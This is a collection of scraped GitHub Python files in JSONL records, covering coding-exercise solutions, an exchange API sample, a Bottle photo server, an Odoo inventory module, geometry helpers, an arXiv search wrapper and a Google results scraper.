thread_pool[thread].start()\n","repo_name":"MikhaelMIEM/donations_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30865862682","text":"class Solution:\n def maxArea(self, H: List[int]) -> int:\n # [1,8,6,2,5,4,8,3,7]\n maxA=0\n i=0\n j = len(H)-1\n while (i < j):\n if H[i] <= H[j]:\n area = H[i] * (j - i)\n i += 1\n else:\n area = H[j] * (j - i)\n j -= 1\n if area > maxA:\n maxA = area\n return maxA\n\n\n# https://leetcode.com/problems/container-with-most-water/\n","repo_name":"mintesnot96/competitive-Programming-A2SV","sub_path":"11. Container With Most Water leetcode DSA.py","file_name":"11. Container With Most Water leetcode DSA.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41457409501","text":"N, K =map(int, input().split())\ncoins=[]\nfor i in range(N):\n coin =int(input())\n if coin K:\n target = coins.pop()\n share = K//target\n answer+=share\n K-=share*target\nprint(answer) \n","repo_name":"AlgorithmOnline/jaeeun","sub_path":"2_20201029.py","file_name":"2_20201029.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34629745531","text":"import requests\nurl = \"https://api.upbit.com/v1/orderbook\"\nquerystring = {\"markets\":\"KRW-BTC\"}\nresponse = requests.request(\"GET\", url, params=querystring)\nprint(response.text)\n\n\nimport os\nimport jwt\nimport uuid\nimport hashlib\nfrom urllib.parse import urlencode\n\nimport requests\n\nserver_url = 'https://api.upbit.com'\nf = open(\"../upbit_api_key.txt\", 'r')\naccess_key = f.readline().rstrip()\nsecret_key = f.readline().rstrip()\nf.close()\n#up = Coin('upbit',access_key,secret_key)\n\npayload = {\n 'access_key': access_key,\n 'nonce': str(uuid.uuid4()),\n}\n\njwt_token = jwt.encode(payload, secret_key).decode('utf-8')\nauthorize_token = 'Bearer {}'.format(jwt_token)\nheaders = {\"Authorization\": authorize_token}\n\nres = requests.get(server_url + \"/v1/accounts\", headers=headers)\n\nprint(res.json())","repo_name":"sevity/coin_strategy","sub_path":"exchange/upbit/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"72818680769","text":"# Melhore o \"ex061\", perguntando para o usuário se ele quer mostrar mais alguns termos.\n# O programa encerrará quando ele disser que quer mostrar 0 termos.\n\nprimeiro = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\ntermo = primeiro\nc = 1\ntot = 0\nmais = 10\n\nwhile mais != 0:\n tot += mais\n\n while c <= tot:\n print(f'{termo} → ', end='')\n\n termo += razao\n c += 1\n\n print('PAUSA')\n\n mais = int(input('Quantos termos você quer mostrar a mais? '))\n\nprint('FIM')\n","repo_name":"gabazevdo/python","sub_path":"Curso_em_Vídeo/mundo2_estruturas_de_controle/ex062-super_progressao_aritmetica.py","file_name":"ex062-super_progressao_aritmetica.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19759253375","text":"#!/usr/bin/python\n\nfrom bottle import Bottle, run, template, static_file\nfrom dircache import listdir\nfrom os import sep\n\nprism = Bottle()\n\n# Testing ...\n@prism.route('/')\n@prism.route('/hello')\n@prism.route('/hello/')\ndef hello(name='Stranger'):\n return template('Hello {{name}}, how are you today?', name=name)\n\n# Testing ...\n@prism.route('/Photographs')\n@prism.route('/Photographs/')\ndef send_dir(directory=''):\n path = photos_base_dir + sep + directory\n #return template('I will send you path: {{path}}', path=path)\n return listdir(path)\n\n# Display a photo\n@prism.route('/Photographs/')\ndef send_image(image):\n if image[-1] == '/': # directory\n return send_dir(image)\n else:\n return static_file(image, root='/home/djh/Dropbox/Photographs')\n\n# Display a set\n@prism.route('/sets')\n@prism.route('/sets/')\n@prism.route('/sets/')\ndef view_set(setid='Stranger'):\n return template('Hello {{setid}}, how are you today?', setid=setid)\n\n# Display a collection of sets and collections\n@prism.route('/collections')\n@prism.route('/collections/')\ndef view_set(collectionid='Stranger'):\n return template('Hello {{collectionid}}, how are you today?',\n collectionid=collectionid)\n\nrun(prism, host='localhost', port=8080, debug=True)\n","repo_name":"dannyman/prism","sub_path":"run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10660037856","text":"import json\nfrom enum import Enum, auto\n\n\nclass ASCIITransportFormat:\n\n class SupportedTypes(Enum):\n FILE = auto()\n JSON = auto()\n STRING = auto()\n\n def __init__(\n self,\n data_type: SupportedTypes=None,\n data: str=None,\n encoded: bool=False,\n ) -> None:\n \"\"\"ASCIITransportFormat constructor.\n Parameters:\n data_type: can currently be FILE, JSON, or STRING enums, data_type\n of constructing data, refer to SupportedTypes enum\n data: a filename, JSON string, or ASCII string, used to\n construct object\n encoded: bool that says whether the input data is encoded\n Returns: None\n \"\"\"\n # Initialize needed object flags.\n self.encoded = encoded\n self.pseudo_encode = False\n\n # Return and call the correct functions depending on data_type.\n if (data_type and data_type in ASCIITransportFormat.SupportedTypes):\n {\n ASCIITransportFormat.SupportedTypes.FILE:\n self._populate_with_filename,\n ASCIITransportFormat.SupportedTypes.JSON:\n self._populate_with_json,\n ASCIITransportFormat.SupportedTypes.STRING:\n self._populate_with_string,\n }.get(data_type)(data)\n else:\n raise ValueError('Constructor used incorrectly.')\n\n def encode(self, force: bool=False) -> None:\n \"\"\"Encode the current object's data.\n Parameters:\n force: Flag to prevent accidentally re-encoding, encoded data.\n Returns: None\n \"\"\"\n if not force and self.encoded:\n raise ValueError(\n 'Cannot encode already encoded data. Try setting the '\n '`force` flag if you believe your usage is correct. '\n 'This may cause unexpected behavior.'\n )\n else:\n # Encode the actual data and record the result.\n encoded_result = ASCIITransportFormat.encode_data(self.data)\n if len(encoded_result) < len(self.data):\n # If actually compressed, then use compressed version\n # which is not pseudo encoded.\n self.data = encoded_result\n self.psuedo_encode = False\n else:\n # If compression is larger than original, don't use the larger\n # version and enable pseudo encoding.\n self.pseudo_encode = True\n # Set encoded flag if this function was run.\n self.encoded = True\n\n def decode(self) -> None:\n \"\"\"Decodes the current object's data.\n Parameters:\n Returns: None\n \"\"\"\n if not self.encoded:\n raise ValueError('Cannot decode already decoded data.')\n elif not self.pseudo_encode:\n # Only run decode if not pseudo encoded.\n self.data = ASCIITransportFormat.decode_data(self.data)\n # Reset encode flags since this is now decoded.\n self.encoded = False\n self.pseudo_encode = False\n\n def encode_data(data: str) -> str:\n \"\"\"Encodes a string and returns the result.\n Parameters:\n data: String to encode.\n Returns: The encoded string result.\n \"\"\"\n # Empty data should return an empty string.\n if not data:\n return ''\n\n # Count + char elements held in a list before joining at the end.\n encoded_elements = []\n\n # FSM to implement encoding.\n current_char, current_count = None, 0\n for char in data:\n # Count repeating characters, increment when repeating characters\n # are found and store the count + char when char stops repeating.\n if current_char is None:\n # Set the char to the current char if nothing has been set yet.\n current_char = char\n current_count += 1\n elif current_char != char:\n # Store pair and reset state if character not repeating a pair\n # will look like '3a' for a run of 3 repeating 'a' chars.\n encoded_elements.append(str(current_count)+current_char)\n current_char = char\n current_count = 1\n else:\n # Increment for repeats.\n current_count += 1\n\n # Store the very last pair of count + char.\n encoded_elements.append(str(current_count)+current_char)\n\n # Return a string that can be easily stored and transported\n # a space is used as a delimiter here between count + char pairs.\n # i.e. '3a 3b 5c 1e'\n return ' '.join(encoded_elements)\n\n def decode_data(data: str) -> str:\n \"\"\"Decodes an encoded string and returns the result.\n Parameters:\n data: Encoded data to decode.\n Returns: The decoded string result.\n \"\"\"\n # Empty data should return an empty string.\n if not data:\n return ''\n\n # Initialize empty string to build decoded string.\n decoded_string = ''\n\n # FSM to implement decoding.\n space_seen = False\n\n # This is the string that tracks our current count + char pair.\n current_element = ''\n for char in data:\n # If a space is seen and the current char is a space,\n # then we have double spaces, this means that only the second one\n # is our delimiter and we want to use the first space as a run.\n if space_seen and char != ' ':\n # A current element will look like '10a ' where\n # current_element[:-2] will be the count, '10' and\n # current_element[-2] will be the 'a' the character\n # current_element[-1] which is the delimiter which we ignore.\n decoded_string += (\n int(current_element[:-2]) * current_element[-2])\n\n # Reset space seen and set current_element to the new char.\n space_seen = False\n current_element = char\n else:\n # Append count + char pair to current element.\n # This is used to isolate runs of characters.\n current_element += char\n\n # Note that we see a space, this is our delimiter.\n if char == ' ':\n space_seen = True\n\n # Add the final count + char pair/element, no trailing space at end.\n decoded_string += int(current_element[:-1]) * current_element[-1]\n\n return decoded_string\n\n def json(self) -> str:\n \"\"\"Decodes an encoded string and returns the result.\n Parameters:\n Returns: String representing a JSON on object data.\n \"\"\"\n return json.dumps(self.__dict__)\n\n def get_data(self) -> str:\n \"\"\"Object data accessor.\n Parameters:\n Returns: The object's data.\n \"\"\"\n return self.data\n\n def is_encoded(self) -> bool:\n \"\"\"Object encoded flag accessor.\n Parameters:\n Returns: Whether the current data is encoded or not.\n \"\"\"\n return self.encoded\n\n def _populate_with_filename(self, data: str) -> None:\n \"\"\"Private function populates object with data from a file.\n Parameters:\n data: File name.\n Returns: None\n \"\"\"\n with open(data) as f:\n self.data = f.read()\n\n def _populate_with_json(self, data: str) -> None:\n \"\"\"Private function populates object with data from a JSON.\n Parameters:\n data: String representing JSON.\n Returns: None.\n \"\"\"\n new_data = json.loads(data)\n self._populate_with_dict(new_data)\n\n def _populate_with_dict(self, data: dict) -> None:\n \"\"\"Private function populates object with data from a dict.\n Parameters:\n data: dict representing an ASCIITransportFormat's __dict__.\n Returns: None\n \"\"\"\n self.data = data['data']\n self.encoded = data['encoded']\n self.pseudo_encode = data['pseudo_encode']\n\n def _populate_with_string(self, data: str) -> None:\n \"\"\"Private function populates object with data from a string.\n Parameters:\n data: String to directly populate data with.\n Returns: None\n \"\"\"\n self.data = data\n","repo_name":"edmundloo/ASCIITransportFormat","sub_path":"ascii_transport_format.py","file_name":"ascii_transport_format.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"2904122373","text":"from datetime import datetime \nfrom odoo import api, fields, models, _\n\nclass Inventory(models.Model):\n _inherit = \"stock.inventory\"\n _description = \"Inventory\"\n _order = \"date desc, id desc\"\n\n name = fields.Char(\n 'Inventory Reference',\n readonly=True, required=False,\n states={'draft': [('readonly', False)]}, compute='_compute_cycle_count_name')\n\n cycle_count_name = fields.Char(\n 'Inventory Reference',\n readonly=True, required=True,\n states={'draft': [('readonly', False)]}, default=lambda self: self.env.user.partner_id.name + datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\"),)\n\n cycle_count_filter = fields.Selection(\n string='Inventory of', selection='_selection_filter_cycle_count',\n required=True,\n default='none',\n help=\"If you do an entire inventory, you can choose 'All Products' and it will prefill the inventory with the current stock. If you only do some products \"\n \"(e.g. Cycle Counting) you can choose 'Manual Selection of Products' and the system won't propose anything. You can also let the \"\n \"system propose for a single product / lot /... \")\n\n location_id = fields.Many2one(\n 'stock.location', 'Inventoried Location',\n readonly=True, required=True,\n states={'draft': [('readonly', False)]},\n default=None)\n\n def _compute_cycle_count_name(self):\n for record in self:\n record.name = record.cycle_count_name\n\n @api.model\n def _selection_filter_cycle_count(self):\n \"\"\" Get the list of filter allowed according to the options checked\n in 'Settings\\Warehouse'. \"\"\"\n res_filter = [\n ('none', _('All products')),]\n return res_filter\n\n @api.multi\n def cycle_count_action_start(self):\n for inventory in self.filtered(lambda x: x.state not in ('done','cancel')):\n vals = {'state': 'confirm', 'date': fields.Datetime.now()}\n if (inventory.filter != 'partial') and not inventory.line_ids:\n vals.update({'line_ids': [(0, 0, line_values) for line_values in inventory.cycle_count_get_inventory_lines_values()]})\n inventory.write(vals)\n tree_view_id = self.env.ref('stock.view_inventory_tree').id\n form_view_id = self.env.ref('cycle_count.cycle_count_view_inventory_form').id\n return {\n 'name': _('Inventory Adjustments'),\n 'type': 'ir.actions.act_window',\n 'views': [(form_view_id, 'form'), (tree_view_id, 'tree'),],\n 'view_mode': 'tree, form',\n 'view_type': 'form',\n 'target': 'current',\n 'res_id': inventory.id,\n 'res_model': 'stock.inventory',\n 'context': {'form_view_initial_mode': 'edit', 'force_detailed_view': 'true'},\n }\n\n def cycle_count_get_inventory_lines_values(self):\n # TDE CLEANME: is sql really necessary ? I don't think so\n locations = self.env['stock.location'].search([('id', 'child_of', [self.location_id.id])])\n domain = ' location_id in %s AND quantity != 0 AND active = TRUE'\n args = (tuple(locations.ids),)\n\n vals = []\n Product = self.env['product.product']\n # Empty recordset of products available in stock_quants\n quant_products = self.env['product.product']\n # Empty recordset of products to filter\n products_to_filter = self.env['product.product']\n\n # case 0: Filter on company\n if self.company_id:\n domain += ' AND company_id = %s'\n args += (self.company_id.id,)\n\n #case 1: Filter on One owner only or One product for a specific owner\n if self.partner_id:\n domain += ' AND owner_id = %s'\n args += (self.partner_id.id,)\n #case 2: Filter on One Lot/Serial Number\n if self.lot_id:\n domain += ' AND lot_id = %s'\n args += (self.lot_id.id,)\n #case 3: Filter on One product\n if self.product_id:\n domain += ' AND product_id = %s'\n args += (self.product_id.id,)\n products_to_filter |= self.product_id\n #case 4: Filter on A Pack\n if self.package_id:\n domain += ' AND package_id = %s'\n args += (self.package_id.id,)\n #case 5: Filter on One product category + Exahausted Products\n if self.category_id:\n categ_products = Product.search([('categ_id', 'child_of', self.category_id.id)])\n domain += ' AND product_id = ANY (%s)'\n args += (categ_products.ids,)\n products_to_filter |= categ_products\n\n self.env.cr.execute(\"\"\"SELECT product_id, sum(quantity) as product_qty, location_id, lot_id as prod_lot_id, package_id, owner_id as partner_id\n FROM stock_quant\n LEFT JOIN product_product\n ON product_product.id = stock_quant.product_id\n WHERE %s\n GROUP BY product_id, location_id, lot_id, package_id, partner_id \"\"\" % domain, args)\n\n for product_data in self.env.cr.dictfetchall():\n # replace the None the dictionary by False, because falsy values are tested later on\n for void_field in [item[0] for item in product_data.items() if item[1] is None]:\n product_data[void_field] = False\n product_data['theoretical_qty'] = product_data['product_qty']\n if product_data['product_id']:\n product_data['product_uom_id'] = Product.browse(product_data['product_id']).uom_id.id\n quant_products |= Product.browse(product_data['product_id'])\n vals.append(product_data)\n if self.exhausted:\n exhausted_vals = self._get_exhausted_inventory_line(products_to_filter, quant_products)\n vals.extend(exhausted_vals)\n cycle_count_values = []\n for i in vals:\n if i['theoretical_qty'] >= 1:\n i['product_qty'] = i['theoretical_qty']\n cycle_count_values.append(i) \n return cycle_count_values","repo_name":"andriisem/odoosh","sub_path":"cycle_count/models/stock_inventory.py","file_name":"stock_inventory.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9362971051","text":"print('--------- Task 1 ----------')\n'''\n1. Создать список и заполнить его элементами различных типов данных.Реализовать скрипт\nпроверки типа данных каждого элемента. Использовать функцию type() для проверки типа.\nЭлементы списка можно не запрашивать у пользователя, а указать явно, в программе.\n2. Для списка реализовать обмен значений соседних элементов. Значениями обмениваются\n'''\n\nlst = [1, 1.0, 'a', True, ['b', 2], {1:'a'}, ('a', 3), None]\nfor i in lst:\n print(type(i))\n\n\nprint('--------- Task 2 ----------')\n'''\n2. Для списка реализовать обмен значений соседних элементов. Значениями обмениваются\nэлементы с индексами 0 и 1, 2 и 3 и т. д. При нечётном количес��ве элементов последний\nсохранить на своём месте. Для заполнения списка элементов нужно использовать функцию\ninput().\n\n'''\n\nlst = [1, 'a', 2, 'b', 3]\nfor i in range(0, len(lst)-1, 2):\n lst[i], lst[i + 1] = lst[i + 1], lst[i]\n\nprint(lst)\n\nprint('--------- Task 3 ----------')\n'''\n3. Пользователь вводит месяц в виде целого числа от 1 до 12. Сообщить, к какому времени года\nотносится месяц (зима, весна, лето, осень). Напишите решения через list и dict.\n'''\n\n\ndct = {9:'Осень', 10:'Осень', 11:'Осень', 12:'Зима', 1:'Зима', 2:'Зима', 3:'Весна', \\\n 4:'Весна', 5:'Весна', 6:'Лето', 7:'Лето', 8:'Лето'}\n\nnum = int(input('Введите номер месяца: '))\n\nprint(f'Это {dct.get(num)}')\n\n\n\nlst = ['Осень', 'Зима', 'Весна', 'Лето']\n\nm = int(input('Введите номер месяца: '))\n\n\nif m == 9 or m == 10 or m == 11:\n print(f'Это {lst[0]}')\nelif m == 12 or m == 1 or m == 2:\n print(f'Это {lst[1]}')\nelif m == 3 or m == 4 or m == 5:\n print(f'Это {lst[2]}')\nelse:\n print(f'Это {lst[3]}')\n\nprint('--------- Task 4 ----------')\n'''\n4. Пользователь вводит строку из нескольких слов, разделённых пробелами. Вывести каждое\nслово с новой строки. Строки нужно пронумеровать. Если слово длинное, выводить только\nпервые 10 букв в слове.\n\n'''\n\n\nst = 'Пользователь вводит строку из нескольких слов'\nst = st.split()\nfor i in st:\n if len(i) > 10:\n print(i[0:10])\n else:\n print(i)\n\nprint('--------- Task 5 ----------')\n'''\n5. Реализовать структуру «Рейтинг», представляющую собой набор натуральных чисел, который\nне возрастает. У пользователя нужно запрашивать новый элемент рейтинга. Если в рейтинге\nсуществуют элементы с одинаковыми значениями, то новый элемент с тем же значением\nдолжен разместиться после них.\n\n\n'''\n\nmy_list = [7, 5, 3, 3, 2]\nprint(my_list)\n\nnum = float(input('Enter number: ')) # флоат номер чтобы легче отследить\n\nfor i in range(0, len(my_list)-1):\n if num > max(my_list):\n my_list.insert(0, num)\n break\n elif num <= min(my_list):\n my_list.append(num)\n break\n elif my_list[i] >= num and my_list[i + 1] < num:\n my_list.insert(i + 1, num)\n break\n \nprint(my_list)\n\nprint('--------- Task 6 ----------')\n'''\n6. *Реализовать структуру данных «Товары». Она должна представлять собой список кортежей.\nКаждый кортеж хранит информацию об отдельном товаре. В кортеже должно быть два\nэлемента — номер товара и словарь с параметрами, то есть характеристиками товара:\nназвание, цена, количество, единица измерения. Структуру нужно сформировать программно,\nзапросив все данные у пользователя.\nНужно собрать аналитику о товарах. Реализовать словарь, в котором каждый ключ —\nхарактеристика товара, например, название. Тогда значение — список\nзначений-характеристик, например, список названий товаров.\n'''\n\nx = 0\ndct = {}\ntpl = ()\nlst = []\nwhile 1:\n x += 1\n dct = {}\n name = input('Название: ')\n if name == 'q':\n break\n dct.update({'Name':name})\n price = input('Цена: ')\n dct.update({'Price':price})\n quantity = input('Количество: ')\n dct.update({'Quantity':quantity})\n unit = input('Ед: ')\n dct.update({'Unit':unit})\n tpl = (x, dct)\n lst.append(tpl)\n\nprint('\\n', lst, '\\n')\n\nanalytics = {}\nls_name = []\nls_price = []\nls_quantity = []\nls_unit = []\nfor i in range(0, len(lst)):\n ls_name.append(lst[i][1]['Name'])\n ls_price.append(lst[i][1]['Price'])\n ls_quantity.append(lst[i][1]['Quantity'])\n ls_unit.append(lst[i][1]['Unit'])\n st_unit = set(ls_unit) # Убрать совпадение \n ls_unit = list(st_unit) # Вернуть список\n analytics.update({'Name':ls_name})\n analytics.update({'Price':ls_price})\n analytics.update({'Quantity':ls_quantity})\n analytics.update({'Unit':ls_unit})\n \nprint(analytics)\n","repo_name":"VDK45/45","sub_path":"Lesson_2.py","file_name":"Lesson_2.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5402424780","text":"\ndef printGreeting():\n print(\"Wassup cuz\")\n\ndef readFile(filename):\n exam = {} \n tempList = []\n inFile = open(filename,\"r\")\n for line in inFile:\n tempList = line.strip().split()\n exam[tempList[0]] = tempList[1]\n return exam \n\ndef findMean(scores):\n total = 0\n average = 0\n counter = 0\n for i in range(len(scores)):\n total += int(scores[i])\n counter += 1\n average = total / counter \n return average\n\ndef main():\n exam = {}\n filename = \"\"\n average = 0\n printGreeting()\n filename = input(\"input file name: \")\n exam = readFile(filename) \n score = list(exam.values())\n score.sort()\n average = findMean(score)\n lowest = score[0]\n length = len(score) - 1\n highest = score[length]\n print(\"The average score is \", average)\n print(\"Lowest Score is : \", lowest)\n print(\"Highest score is: \", highest)\nmain()\n","repo_name":"kn33hit/Coursework","sub_path":"GL_backup/201/LABS/LAB13/lab13.py","file_name":"lab13.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31960805627","text":"import math\nimport numpy as np\nfrom shapely import wkt\nfrom haversine import haversine, Unit\nfrom shapely.geometry import Point, LineString\n\n\ndef coords_pair_dist(o, d, xy=True):\n if isinstance(o, Point) and isinstance(d, Point):\n return haversine((o.y, o.x), (d.y, d.x), unit=Unit.METERS)\n \n if (isinstance(o, tuple) and isinstance(d, tuple)) or \\\n (isinstance(o, list) and isinstance(d, list)):\n if xy:\n return haversine(o[:2][::-1], d[:2][::-1], unit=Unit.METERS)\n else:\n return haversine(o[:2], d[:2], unit=Unit.METERS)\n \n return np.inf\n\n\ndef azimuth_diff(a, b, unit='radian'):\n \"\"\"calcaluate the angle diff between two azimuth\n Args:\n a ([type]): Unit: degree\n b ([type]): Unit: degree\n unit(string): radian or degree\n Returns:\n [type]: [description]\n \"\"\"\n diff = abs(a-b)\n\n if diff > 180:\n diff = 360-diff\n\n return diff if unit =='degree' else diff*math.pi/180\n\n\ndef azimuthAngle(x1, y1, x2, y2):\n \"\"\"calculate the azimuth angle from (x1, y1) to (x2, y2)\n\n Args:\n x1 (float): [description]\n y1 (float): [description]\n x2 (float): [description]\n y2 (float): [description]\n\n Returns:\n float: The angle in degree.\n \"\"\"\n angle = 0.0\n dx, dy = x2 - x1, y2 - y1\n\n if dx == 0:\n angle = math.pi * 0\n if y2 == y1 :\n angle = 0.0\n elif y2 < y1 :\n angle = math.pi\n elif dy == 0:\n angle = 0\n if dx > 0:\n angle = math.pi / 2.0\n else:\n angle = math.pi / 2.0 * 3.0\n elif x2 > x1 and y2 > y1:\n angle = math.atan(dx / dy)\n elif x2 > x1 and y2 < y1 :\n angle = math.pi / 2 + math.atan(-dy / dx)\n elif x2 < x1 and y2 < y1 :\n angle = math.pi + math.atan(dx / dy)\n elif x2 < x1 and y2 > y1 :\n angle = 3.0 * math.pi / 2.0 + math.atan(dy / -dx)\n\n return angle * 180 / math.pi\n\n\ndef cal_polyline_azimuth(geom):\n \"\"\"caculate the azimuth of a polyline.\n\n Args:\n geom (LineString): The polyline geometry.\n\n Returns:\n [list]: The list of azimuth.\n \"\"\"\n if isinstance(geom, LineString):\n coords = geom.coords[:]\n if isinstance(geom, list):\n coords = geom\n seg_angels = [azimuthAngle( *coords[i], *coords[i+1] ) for i in range(len(coords)-1) ]\n\n return seg_angels\n\n\ndef cal_points_azimuth(geoms:list):\n \"\"\"caculate the azimuth of a trajectory.\n\n Args:\n geom (LineString): The polyline geometry.\n\n Returns:\n [list]: The list of azimuth.\n \"\"\"\n if not geoms or not geoms[0]:\n return None\n if not isinstance( geoms[0], Point):\n return None\n \n coords = [ g.coords[0] for g in geoms ]\n seg_angels = [azimuthAngle( *coords[i], *coords[i+1] ) for i in range(len(coords)-1) ]\n \n return seg_angels\n\n\ndef azimuth_cos_similarity(road_angels, head_azimuth):\n # Ref: https://www.cnblogs.com/bymo/p/8489037.html\n val = np.mean(\n np.cos(\n [(azimuth_diff(i, head_azimuth) * math.pi/180) for i in road_angels ]\n )\n )\n \n return val\n\n\ndef azimuth_cos_similarity_for_linestring(geom, head_azimuth, weight=True):\n if isinstance(geom, LineString):\n coords = geom.coords[:]\n if isinstance(geom, list):\n coords = geom\n \n road_angels = cal_polyline_azimuth(coords)\n\n lst = np.cos( [(azimuth_diff(i, head_azimuth) * math.pi/180) for i in road_angels ])\n if not weight:\n val = np.mean(lst)\n else:\n weights = np.array([coords_pair_dist(coords[i], coords[i+1], xy=True) for i in range(len(coords)-1)]) \n val = np.average(lst, weights=weights)\n \n return val\n \n\nif __name__ == '__main__':\n p0 = wkt.loads('POINT (113.934151 22.577512)')\n p1 = wkt.loads('POINT (113.934144 22.577979)')\n # net.df_edges.loc[82190].geometry\n polyline = wkt.loads('LINESTRING (113.9340705 22.577737, 113.9340788 22.5777828, 113.934093 22.5778236, 113.9341161 22.5778661, 113.934144 22.5779051, 113.934186 22.57795, 113.9342268 22.5779823, 113.9342743 22.5780131, 113.9343212 22.5780352, 113.9343734 22.5780515, 113.9344212 22.5780605, 113.9344796 22.5780669)')\n\n angels =azimuthAngle(*p0.coords[0], *p1.coords[0])\n\n road_angels = cal_polyline_azimuth(polyline)\n head_azimuth = cal_points_azimuth([p0, p1])\n\n azimuth_cos_similarity(road_angels, head_azimuth[0])\n \n azimuth_cos_similarity_for_linestring(polyline, head_azimuth[0], True)\n \n azimuth_cos_similarity_for_linestring(polyline, head_azimuth[0], False)","repo_name":"wenke727/RoadNetworkCreator","sub_path":"src/utils/azimuth_helper.py","file_name":"azimuth_helper.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32679474130","text":"import arxiv\n\n\ndef search(query=\"\", max_results=10, sort_by=\"Relevance\", sort_order=\"Descending\"):\n\n sr_by_dict = {\"Relevance\": arxiv.SortCriterion.Relevance, \"Last Updated Date\":\n arxiv.SortCriterion.LastUpdatedDate, \"Submitted Date\": arxiv.SortCriterion.SubmittedDate}\n sr_or_dict = {\"Descending\": arxiv.SortOrder.Descending,\n \"Ascending\": arxiv.SortOrder.Ascending}\n\n search = arxiv.Search(\n query=query,\n max_results=max_results,\n sort_by=sr_by_dict[sort_by],\n sort_order=sr_or_dict[sort_order])\n src_lst = []\n for i in search.results():\n id = i.entry_id.split(\"/\")\n src_lst.append(i.title+\" - \" + str(id[-1]))\n\n return src_lst\n","repo_name":"ArchanGhosh/ArxivAudio","sub_path":"modules/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20840369835","text":"import queue\n\n\ndef solution(priorities, location):\n cnt = 0\n\n while priorities:\n max_num = max(priorities)\n if priorities[0] < max_num:\n priorities.append(priorities[0])\n location = locate(priorities, location)\n print(location)\n del priorities[0]\n elif priorities[0] == max_num and location != 0:\n location = locate(priorities, location)\n print(location)\n del priorities[0]\n cnt += 1\n elif priorities[0] == max_num and location == 0:\n del priorities[0]\n cnt += 1\n return cnt\n\n\ndef locate(priorities, location):\n if location - 1 < 0:\n return len(priorities) - 2\n else:\n return location - 1\n","repo_name":"PigletHong/CodingTest","sub_path":"프로그래머스/lv2/42587. 프린터/프린터.py","file_name":"프린터.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24806263740","text":"'''\r\nTitle : Google result page crawling\r\nAuthor : BC Gwak\r\nWhat to do : \r\n This source code will catch URL, title, contents \r\n from Google search result using BeautifulSoup \r\n And insert the results into Mongodb\r\n Simply use it when you want to put test data into DB\r\nNeeded packages : \r\n In order to use this source, install these packages.\r\n pip install requests\r\n pip install beautifulsoup4\r\n pip install pymongo\r\n pip install lxml\r\nHow to get the code : \r\n git clone https://github.com/kbckbc/ggcrawling.git .\r\nRun debug mode :\r\n python ggcrawling.py\r\nRun non-debug mode :\r\n python -O ggcrawling.py\r\n'''\r\n\r\nfrom tkinter import E\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pymongo import MongoClient\r\nfrom datetime import datetime\r\n\r\nclient = MongoClient(host=\"localhost\", port=27017)\r\ndb = client.chanboard\r\ncol = db.board\r\n\r\nheader = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\"}\r\ntargetsite = \"https://www.google.com/search?q={}&start={}\"\r\nkeyword = \"washu\"\r\nhowmanypages = 5\r\n\r\nfor i in range(howmanypages):\r\n url = targetsite.format(keyword, i * 10)\r\n getHtml = requests.get(url, headers=header)\r\n bs = BeautifulSoup(getHtml.text, \"lxml\")\r\n contentLists = bs.select(\"div.g\")\r\n\r\n line = 0\r\n for item in contentLists:\r\n current_utc_time = round(datetime.utcnow().timestamp() * 1000)\r\n\r\n try:\r\n site = item.select_one(\"cite\").text\r\n site = site[site.find(\"://\")+3:site.find(\" \", site.find(\"://\")+3)].replace(\"www.\", \"\").replace(\".\", \"_\")\r\n title = item.select_one(\"h3.LC20lb\").text\r\n contents = item.select_one(\"div.IsZvec\").text\r\n line = line+1\r\n if __debug__: print('''result [{}]\r\n utc_time: {}\r\n site: {}\r\n title: {}\r\n contents: {}'''.format(line, current_utc_time, site, title, contents))\r\n col.insert_one({\r\n \"name\": site,\r\n \"title\": title,\r\n \"contents\": contents,\r\n \"view\": 0,\r\n \"date\": current_utc_time\r\n })\r\n except Exception as e:\r\n if __debug__: print(e)\r\n pass\r\n","repo_name":"kbckbc/ggcrawling","sub_path":"ggcrawling.py","file_name":"ggcrawling.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21518268700","text":"from __future__ import absolute_import, division, print_function\n\nimport os\n\nimport e3.anod.driver\nimport e3.anod.sandbox\nimport e3.anod.spec\n\nimport pytest\n\n\ndef test_simple_driver():\n sandbox = e3.anod.sandbox.SandBox()\n\n class 